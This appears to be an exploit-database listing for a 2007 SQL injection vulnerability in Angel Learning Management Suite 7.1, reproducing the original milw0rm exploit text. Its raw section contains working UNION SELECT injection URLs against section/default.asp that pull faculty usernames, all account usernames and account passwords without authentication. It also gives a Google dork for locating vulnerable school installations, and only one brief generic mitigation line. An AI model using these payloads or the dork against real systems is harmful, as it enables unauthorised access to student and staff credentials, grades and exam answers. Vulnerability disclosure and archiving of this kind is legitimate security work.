header-logo
Suggest Exploit
vendor:
Angel Learning Management Suite
by:
Craig Heffner
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: Angel Learning Management Suite
Affected Version From: 7.1
Affected Version To: 7.1
Patch Exists: NO
Related CWE: Unknown
CPE: a:angel_learning:management_suite:7.1
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Angel Learning Management Suite 7.1 SQL Injection Vulnerability

Angel 7.1 contains an SQL injection vulnerability in section/default.asp that grants an un-authenticated user access to all database tables and data. Examples include enumeration of tables, columns, user names, passwords, grades, and test questions/answers.

Mitigation:

Apply appropriate input validation and sanitization techniques to prevent SQL injection attacks. Regularly update and patch the software to fix any security vulnerabilities.
Source

Exploit-DB raw data:

#########################################################################
#
# Application:
#
#		Angel Learning Management Suite 7.1
#		http://www.angellearning.com
#
#########################################################################
#
# Description:
#
#		"ANGEL LMS is an inclusive suite of enterprise 
#		learning management tools that balances ease of 
#		use with powerful capabilities to deliver leading 
#		edge teaching and learning, impact learner success 
#		and measure effectiveness."
#
#		Basically, Angel is a CMS for education, providing
#		online forums, grading, email, chat, etc to faculty
#		and students. It is used as the primary Web interface
#		for several online schools and courses.
#
#########################################################################
#
# Vulnerability:
#
#		Angel 7.1 contains an SQL injection vulnerability in 
#		section/default.asp that grants an un-authenticated user 
#		access to all database tables and data. Examples include 
#		enumeration of tables, columns, user names, passwords, 
#		grades, and test questions/answers (you basically have 
#		access to everything).
#	
#########################################################################
#	
# Exploit Examples:
#
#	#Enumerate Faculty User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20faculty_accounts--"
#		
#	#Enumerate All User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"
#
#	#Enumerate Account Passwords#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
#
#########################################################################
#
# Google Dork:
#		intext:"2006 angel learning, inc" -pdf
#
#########################################################################
#
# Credit:
#	Exploit discovered and coded by Craig Heffner
#	heffnercj [at] gmail.com
#	http://www.craigheffner.com
#
#########################################################################

# milw0rm.com [2007-03-01]